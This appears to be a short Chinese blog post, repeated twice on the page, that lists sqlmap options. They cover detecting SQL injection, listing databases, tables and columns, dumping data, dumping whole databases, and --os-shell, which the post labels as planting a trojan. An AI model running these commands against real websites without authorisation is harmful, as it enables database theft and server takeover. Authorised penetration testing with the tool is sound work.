1、判断网站是否存在注入
get:sqlmap -u “url”
post:sqlmap -r “请求数据包”
2、爆数据库
当前数据库 --current-db
线程 --thread (1-10)
爆所有库 --dbs
指定库 -D
爆所有表 --tables
指定表 -T
爆所有列 --columns
指定列 -C
显示内容 --dump
脱库 --dump-all
挂马 --os-shell
后台特权 --os-shell
sqlmap命令
阅读 41
2022-01-31
1、判断网站是否存在注入
get:sqlmap -u “url”
post:sqlmap -r “请求数据包”
2、爆数据库
当前数据库 --current-db
线程 --thread (1-10)
爆所有库 --dbs
指定库 -D
爆所有表 --tables
指定表 -T
爆所有列 --columns
指定列 -C
显示内容 --dump
脱库 --dump-all
挂马 --os-shell
后台特权 --os-shell
相关推荐
精彩评论(0)
